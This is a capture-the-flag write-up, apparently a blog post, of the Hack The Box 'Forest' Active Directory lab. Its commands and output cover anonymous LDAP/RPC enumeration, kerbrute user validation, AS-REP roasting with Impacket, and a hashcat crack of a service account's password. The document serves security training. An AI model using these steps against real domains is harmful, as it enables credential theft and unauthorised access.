Starting the HTB Active Directory track as preparation for the PNPT and OSCP certifications. Let's dive in.
Initial Enumeration:
The first step will always be your Nmap scan:
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-eqxvgplaz4]─[~]
└──╼ [★]$ nmap -A -p- 10.129.29.48
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-05-05 10:12 CDT
Nmap scan report for 10.129.29.48
Host is up (0.0079s latency).
Not shown: 65512 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-05-05 15:19:47Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=5/5%OT=53%CT=1%CU=33149%PV=Y%DS=2%DC=T%G=Y%TM=69FA0
OS:940%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=108%TI=I%CI=I%II=I%SS=S%T
OS:S=A)OPS(O1=M552NW8ST11%O2=M552NW8ST11%O3=M552NW8NNT11%O4=M552NW8ST11%O5=
OS:M552NW8ST11%O6=M552ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2
OS:000)ECN(R=Y%DF=Y%T=80%W=2000%O=M552NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=
OS:A%A=O%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 2 hops
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 2h26m49s, deviation: 4h02m30s, median: 6m48s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2026-05-05T08:20:49-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2026-05-05T15:20:50
|_ start_date: 2026-05-05T15:17:45
TRACEROUTE (using port 256/tcp)
HOP RTT ADDRESS
1 7.57 ms 10.10.14.1
2 7.80 ms 10.129.29.48
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.15 seconds
With the scan above, we confirm that this is an AD machine with the following info:
- Port 88 (Kerberos): open
- Port 389 (LDAP): open
- Domain name: htb.local
- Computer name: FOREST
LDAP Enumeration:
└──╼ [★]$ ldapsearch -x -H ldap://10.129.29.48 -s base -b "" "(objectClass=*)" namingContexts
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectClass=*)
# requesting: namingContexts
#
#
dn:
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
With the query above, I confirmed the domain name: htb.local
I tried SMB enumeration, but no luck from that angle.
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-eqxvgplaz4]─[~]
└──╼ [★]$ smbclient -L //10.129.29.48 -N
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.29.48 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
RPC Enumeration
I moved on to check for an RPC null session, and it gave back some users:
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-eqxvgplaz4]─[~]
└──╼ [★]$ rpcclient -U "" -N 10.129.29.48
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
rpcclient $>
I also checked the domain groups from the rpcclient prompt:
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
I decided to run enum4linux to check whether it would return the same users as rpcclient, and it gave back not just the users but also the password policy and more:
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-eqxvgplaz4]─[~]
└──╼ [★]$ enum4linux 10.129.29.48
ENUM4LINUX - next generation (v1.3.4)
==========================
| Target Information |
==========================
[*] Target ........... 10.129.29.48
[*] Username ......... ''
[*] Random Username .. 'mkzhqzea'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
=====================================
| Listener Scan on 10.129.29.48 |
=====================================
[*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[+] LDAPS is accessible on 636/tcp
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
====================================================
| Domain Information via LDAP for 10.129.29.48 |
====================================================
[*] Trying LDAP
[+] Appears to be root/parent DC
[+] Long domain name is: htb.local
===========================================================
| NetBIOS Names and Workgroup/Domain for 10.129.29.48 |
===========================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out
=========================================
| SMB Dialect Check on 10.129.29.48 |
=========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: true
SMB 2.02: true
SMB 2.1: true
SMB 3.0: true
SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: true
===========================================================
| Domain Information via SMB session for 10.129.29.48 |
===========================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: FOREST
NetBIOS domain name: HTB
DNS domain: htb.local
FQDN: FOREST.htb.local
Derived membership: domain member
Derived domain: HTB
=========================================
| RPC Session Check on 10.129.29.48 |
=========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[-] Could not establish random user session: STATUS_LOGON_FAILURE
===================================================
| Domain Information via RPC for 10.129.29.48 |
===================================================
[+] Domain: HTB
[+] Domain SID: S-1-5-21-3072663084-364016917-1341370565
[+] Membership: domain member
===============================================
| OS Information via RPC for 10.129.29.48 |
===============================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows Server 2016 Standard 14393
OS version: '10.0'
OS release: '1607'
OS build: '14393'
Native OS: Windows Server 2016 Standard 14393
Native LAN manager: Windows Server 2016 Standard 6.3
Platform id: null
Server type: null
Server type string: null
=====================================
| Users via RPC on 10.129.29.48 |
=====================================
[*] Enumerating users via 'querydispinfo'
[+] Found 31 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 31 user(s) via 'enumdomusers'
[+] After merging user results we have 31 user(s) total:
'1123':
username: $331000-VK4ADACQNUCA
name: (null)
acb: '0x00020015'
description: (null)
'1124':
username: SM_2c8eef0a09b545acb
name: Microsoft Exchange Approval Assistant
acb: '0x00020011'
description: (null)
'1125':
username: SM_ca8c2ed5bdab4dc9b
name: Microsoft Exchange
acb: '0x00020011'
description: (null)
'1126':
username: SM_75a538d3025e4db9a
name: Microsoft Exchange
acb: '0x00020011'
description: (null)
'1127':
username: SM_681f53d4942840e18
name: Discovery Search Mailbox
acb: '0x00020011'
description: (null)
'1128':
username: SM_1b41c9286325456bb
name: Microsoft Exchange Migration
acb: '0x00020011'
description: (null)
'1129':
username: SM_9b69f1b9d2cc45549
name: Microsoft Exchange Federation Mailbox
acb: '0x00020011'
description: (null)
'1130':
username: SM_7c96b981967141ebb
name: E4E Encryption Store - Active
acb: '0x00020011'
description: (null)
'1131':
username: SM_c75ee099d0a64c91b
name: Microsoft Exchange
acb: '0x00020011'
description: (null)
'1132':
username: SM_1ffab36a2f5f479cb
name: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}
acb: '0x00020011'
description: (null)
'1134':
username: HealthMailboxc3d7722
name: HealthMailbox-EXCH01-Mailbox-Database-1118319013
acb: '0x00000210'
description: (null)
'1135':
username: HealthMailboxfc9daad
name: HealthMailbox-EXCH01-001
acb: '0x00000210'
description: (null)
'1136':
username: HealthMailboxc0a90c9
name: HealthMailbox-EXCH01-002
acb: '0x00000210'
description: (null)
'1137':
username: HealthMailbox670628e
name: HealthMailbox-EXCH01-003
acb: '0x00000210'
description: (null)
'1138':
username: HealthMailbox968e74d
name: HealthMailbox-EXCH01-004
acb: '0x00000210'
description: (null)
'1139':
username: HealthMailbox6ded678
name: HealthMailbox-EXCH01-005
acb: '0x00000210'
description: (null)
'1140':
username: HealthMailbox83d6781
name: HealthMailbox-EXCH01-006
acb: '0x00000210'
description: (null)
'1141':
username: HealthMailboxfd87238
name: HealthMailbox-EXCH01-007
acb: '0x00000210'
description: (null)
'1142':
username: HealthMailboxb01ac64
name: HealthMailbox-EXCH01-008
acb: '0x00000210'
description: (null)
'1143':
username: HealthMailbox7108a4e
name: HealthMailbox-EXCH01-009
acb: '0x00000210'
description: (null)
'1144':
username: HealthMailbox0659cc1
name: HealthMailbox-EXCH01-010
acb: '0x00000210'
description: (null)
'1145':
username: sebastien
name: Sebastien Caron
acb: '0x00000210'
description: (null)
'1146':
username: lucinda
name: Lucinda Berger
acb: '0x00000210'
description: (null)
'1147':
username: svc-alfresco
name: svc-alfresco
acb: '0x00010210'
description: (null)
'1150':
username: andy
name: Andy Hislip
acb: '0x00000210'
description: (null)
'1151':
username: mark
name: Mark Brandt
acb: '0x00000210'
description: (null)
'1152':
username: santi
name: Santi Rodriguez
acb: '0x00000210'
description: (null)
'500':
username: Administrator
name: Administrator
acb: '0x00000010'
description: Built-in account for administering the computer/domain
'501':
username: Guest
name: (null)
acb: '0x00000215'
description: Built-in account for guest access to the computer/domain
'502':
username: krbtgt
name: (null)
acb: '0x00000011'
description: Key Distribution Center Service Account
'503':
username: DefaultAccount
name: (null)
acb: '0x00000215'
description: A user account managed by the system.
======================================
| Groups via RPC on 10.129.29.48 |
======================================
[*] Enumerating local groups
[+] Found 5 group(s) via 'enumalsgroups domain'
[*] Enumerating builtin groups
[+] Found 29 group(s) via 'enumalsgroups builtin'
[*] Enumerating domain groups
[+] Found 38 group(s) via 'enumdomgroups'
[+] After merging groups results we have 72 group(s) total:
'1101':
groupname: DnsAdmins
type: local
'1102':
groupname: DnsUpdateProxy
type: domain
'1104':
groupname: Organization Management
type: domain
'1105':
groupname: Recipient Management
type: domain
'1106':
groupname: View-Only Organization Management
type: domain
'1107':
groupname: Public Folder Management
type: domain
'1108':
groupname: UM Management
type: domain
'1109':
groupname: Help Desk
type: domain
'1110':
groupname: Records Management
type: domain
'1111':
groupname: Discovery Management
type: domain
'1112':
groupname: Server Management
type: domain
'1113':
groupname: Delegated Setup
type: domain
'1114':
groupname: Hygiene Management
type: domain
'1115':
groupname: Compliance Management
type: domain
'1116':
groupname: Security Reader
type: domain
'1117':
groupname: Security Administrator
type: domain
'1118':
groupname: Exchange Servers
type: domain
'1119':
groupname: Exchange Trusted Subsystem
type: domain
'1120':
groupname: Managed Availability Servers
type: domain
'1121':
groupname: Exchange Windows Permissions
type: domain
'1122':
groupname: ExchangeLegacyInterop
type: domain
'1133':
groupname: $D31000-NSEL5BRJ63V7
type: domain
'1148':
groupname: Service Accounts
type: domain
'1149':
groupname: Privileged IT Accounts
type: domain
'498':
groupname: Enterprise Read-only Domain Controllers
type: domain
'5101':
groupname: test
type: domain
'512':
groupname: Domain Admins
type: domain
'513':
groupname: Domain Users
type: domain
'514':
groupname: Domain Guests
type: domain
'515':
groupname: Domain Computers
type: domain
'516':
groupname: Domain Controllers
type: domain
'517':
groupname: Cert Publishers
type: local
'518':
groupname: Schema Admins
type: domain
'519':
groupname: Enterprise Admins
type: domain
'520':
groupname: Group Policy Creator Owners
type: domain
'521':
groupname: Read-only Domain Controllers
type: domain
'522':
groupname: Cloneable Domain Controllers
type: domain
'525':
groupname: Protected Users
type: domain
'526':
groupname: Key Admins
type: domain
'527':
groupname: Enterprise Key Admins
type: domain
'544':
groupname: Administrators
type: builtin
'545':
groupname: Users
type: builtin
'546':
groupname: Guests
type: builtin
'548':
groupname: Account Operators
type: builtin
'549':
groupname: Server Operators
type: builtin
'550':
groupname: Print Operators
type: builtin
'551':
groupname: Backup Operators
type: builtin
'552':
groupname: Replicator
type: builtin
'553':
groupname: RAS and IAS Servers
type: local
'554':
groupname: Pre-Windows 2000 Compatible Access
type: builtin
'555':
groupname: Remote Desktop Users
type: builtin
'556':
groupname: Network Configuration Operators
type: builtin
'557':
groupname: Incoming Forest Trust Builders
type: builtin
'558':
groupname: Performance Monitor Users
type: builtin
'559':
groupname: Performance Log Users
type: builtin
'560':
groupname: Windows Authorization Access Group
type: builtin
'561':
groupname: Terminal Server License Servers
type: builtin
'562':
groupname: Distributed COM Users
type: builtin
'568':
groupname: IIS_IUSRS
type: builtin
'569':
groupname: Cryptographic Operators
type: builtin
'571':
groupname: Allowed RODC Password Replication Group
type: local
'572':
groupname: Denied RODC Password Replication Group
type: local
'573':
groupname: Event Log Readers
type: builtin
'574':
groupname: Certificate Service DCOM Access
type: builtin
'575':
groupname: RDS Remote Access Servers
type: builtin
'576':
groupname: RDS Endpoint Servers
type: builtin
'577':
groupname: RDS Management Servers
type: builtin
'578':
groupname: Hyper-V Administrators
type: builtin
'579':
groupname: Access Control Assistance Operators
type: builtin
'580':
groupname: Remote Management Users
type: builtin
'581':
groupname: System Managed Accounts Group
type: builtin
'582':
groupname: Storage Replica Administrators
type: builtin
======================================
| Shares via RPC on 10.129.29.48 |
======================================
[*] Enumerating shares
[+] Found 0 share(s) for user '' with password '', try a different user
=========================================
| Policies via RPC for 10.129.29.48 |
=========================================
[*] Trying port 445/tcp
[+] Found policy:
Domain password information:
Password history length: 24
Minimum password length: 7
Maximum password age: not set
Password properties:
- DOMAIN_PASSWORD_COMPLEX: false
- DOMAIN_PASSWORD_NO_ANON_CHANGE: false
- DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false
- DOMAIN_PASSWORD_LOCKOUT_ADMINS: false
- DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false
- DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false
Domain lockout information:
Lockout observation window: 30 minutes
Lockout duration: 30 minutes
Lockout threshold: None
Domain logoff information:
Force logoff time: not set
=========================================
| Printers via RPC for 10.129.29.48 |
=========================================
[-] Could not get printer info via 'enumprinters': STATUS_ACCESS_DENIED
Completed after 7.12 seconds
Now I have a list of users and need to extract the usernames into a usable format, so I came up with the one-liner below:
grep "username:" users.txt | awk '{gsub(/^\$/, "", $2); print $2}' > usernames.txt
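The enum4linux output above carries more than usernames: the acb value on each record is the MS-SAMR account-control bitmask, so the disabled accounts and any account with Kerberos pre-authentication switched off can be read straight from it. This parser is an added example, not from the original post; the five records embedded in it are copied from the output above, and the flag names follow the MS-SAMR USER_ACCOUNT codes.

```python
import re

# MS-SAMR USER_ACCOUNT control bits; enum4linux prints the whole mask as "acb".
ACB_FLAGS = {
    0x00000001: "DISABLED",
    0x00000004: "PASSWORD_NOT_REQUIRED",
    0x00000010: "NORMAL_ACCOUNT",
    0x00000200: "DONT_EXPIRE_PASSWORD",
    0x00002000: "TRUSTED_FOR_DELEGATION",
    0x00010000: "DONT_REQUIRE_PREAUTH",
    0x00020000: "PASSWORD_EXPIRED",
}
DISABLED = 0x00000001
DONT_REQUIRE_PREAUTH = 0x00010000

# Five records copied from the "Users via RPC" section above (RID, username, acb).
SAMPLE = """\
'1123':
  username: $331000-VK4ADACQNUCA
  name: (null)
  acb: '0x00020015'
  description: (null)
'1134':
  username: HealthMailboxc3d7722
  name: HealthMailbox-EXCH01-Mailbox-Database-1118319013
  acb: '0x00000210'
  description: (null)
'1147':
  username: svc-alfresco
  name: svc-alfresco
  acb: '0x00010210'
  description: (null)
'500':
  username: Administrator
  name: Administrator
  acb: '0x00000010'
  description: Built-in account for administering the computer/domain
'502':
  username: krbtgt
  name: (null)
  acb: '0x00000011'
  description: Key Distribution Center Service Account
"""

RID_RE = re.compile(r"^'(\d+)':$")
FIELD_RE = re.compile(r"^(username|acb):\s*'?([^']*?)'?$")


def parse_users(text):
    """Turn enum4linux user blocks into dicts: {'rid': int, 'username': str, 'acb': int}."""
    users, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = RID_RE.match(line)
        if m:
            current = {"rid": int(m.group(1))}
            users.append(current)
            continue
        m = FIELD_RE.match(line) if current is not None else None
        if m:
            key, value = m.groups()
            current[key] = int(value, 16) if key == "acb" else value
    return users


def decode_acb(acb):
    """Names of the known flags set in an acb mask, lowest bit first."""
    return [name for bit, name in sorted(ACB_FLAGS.items()) if acb & bit]


def enabled_usernames(users):
    """What the grep/awk one-liner yields, minus accounts the KDC rejects as disabled."""
    return [u["username"] for u in users if not u["acb"] & DISABLED]


def asrep_roastable(users):
    """Enabled accounts that do not require Kerberos pre-authentication."""
    return [u["username"] for u in users
            if u["acb"] & DONT_REQUIRE_PREAUTH and not u["acb"] & DISABLED]


if __name__ == "__main__":
    users = parse_users(SAMPLE)
    for u in users:
        flags = " | ".join(decode_acb(u["acb"]))
        print(f"{u['rid']:>5}  {u['username']:<24} 0x{u['acb']:08x}  {flags}")
    print("enabled:", enabled_usernames(users))
    print("AS-REP roastable:", asrep_roastable(users))
```

Run over all 31 records above, the 13 accounts with the DISABLED bit set are exactly the 13 that kerbrute does not report as valid, and svc-alfresco (acb 0x00010210) is the only account carrying DONT_REQUIRE_PREAUTH, which is what GetNPUsers confirms further down.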
Now, with the list of domain users ready, let's check it with kerbrute to be sure we have valid users.
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-eqxvgplaz4]─[~]
└──╼ [★]$ ./kerbrute_linux_amd64 userenum -d htb.local usernames.txt --dc 10.129.29.48
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 05/05/26 - Ronnie Flathers @ropnop
2026/05/05 11:06:48 > Using KDC(s):
2026/05/05 11:06:48 > 10.129.29.48:88
2026/05/05 11:06:48 > [+] VALID USERNAME: HealthMailboxc3d7722@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: HealthMailboxfc9daad@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: HealthMailbox968e74d@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: HealthMailbox670628e@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: HealthMailboxfd87238@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: HealthMailboxb01ac64@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: HealthMailboxc0a90c9@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: sebastien@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: HealthMailbox7108a4e@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: HealthMailbox0659cc1@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: svc-alfresco@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: lucinda@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: HealthMailbox6ded678@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: santi@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: mark@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: andy@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: HealthMailbox83d6781@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: Administrator@htb.local
2026/05/05 11:06:48 > Done! Tested 31 usernames (18 valid) in 0.045 seconds
We got back 18 valid domain users from our list of 31. Now let's check AS-REP roasting for all the valid usernames to see whether any of them has DONT_REQ_PREAUTH enabled; if we find one, we get back that user's AS-REP hash, which we can take offline and crack.
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-eqxvgplaz4]─[~]
└──╼ [★]$ GetNPUsers.py 'htb.local/' -usersfile valid_username.txt -format hashcat -outputfile forestbox.aspreroast -dc-ip 10.129.29.48
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[-] User HealthMailboxc3d7722 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxfc9daad doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox968e74d doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox670628e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxfd87238 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxb01ac64 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxc0a90c9 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox7108a4e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox0659cc1 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:e1f287c1c6364d475b6d5bbec387512d$b816a045addd996ab16093ef48579ccd1439f796148d0a903d0934b93ad5e94c2ce3c35156137d253c4eef31999e57dcaba0060fd910d7b693c51c768b80c02c4324f11b1e2350b7e2ad2b65e918f7e80e9de116d9a7f2bef847492c0bf11857412ee446a258040373634b67651a4ee8243e2db2380a4dad3d49c9eb13a58b0d7598674726803e4d8ffbd51151b67bf7161441445c0a0a4bbed4ba2c3732ea4f36b79d98d0b4e3a1c707ac21d3f87b38c67e4b1099b672274ec89dca4302650ff49911f2d9b23937722b195a3973b4dd48a557587b099cf0b966cfe27452ceab74f9882eaf89
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox83d6781 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] invalid principal syntax
Great!!! We got back the svc-alfresco hash. Let's take it offline and see whether we can crack it with hashcat.
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-eqxvgplaz4]─[~]
└──╼ [★]$ hashcat -m 18200 forestbox.aspreroast /usr/share/wordlists/rockyou.txt --force
hashcat (v6.2.6) starting
You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-haswell-AMD EPYC 7543 32-Core Processor, skipped
OpenCL API (OpenCL 2.1 LINUX) - Platform #2 [Intel(R) Corporation]
==================================================================
* Device #2: AMD EPYC 7543 32-Core Processor, 3923/7910 MB (988 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 1 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
$krb5asrep$23$svc-alfresco@HTB.LOCAL:e1f287c1c6364d475b6d5bbec387512d$b816a045addd996ab16093ef48579ccd1439f796148d0a903d0934b93ad5e94c2ce3c35156137d253c4eef31999e57dcaba0060fd910d7b693c51c768b80c02c4324f11b1e2350b7e2ad2b65e918f7e80e9de116d9a7f2bef847492c0bf11857412ee446a258040373634b67651a4ee8243e2db2380a4dad3d49c9eb13a58b0d7598674726803e4d8ffbd51151b67bf7161441445c0a0a4bbed4ba2c3732ea4f36b79d98d0b4e3a1c707ac21d3f87b38c67e4b1099b672274ec89dca4302650ff49911f2d9b23937722b195a3973b4dd48a557587b099cf0b966cfe27452ceab74f9882eaf89:s3rvice
Session..........: hashcat
Status...........: Cracked
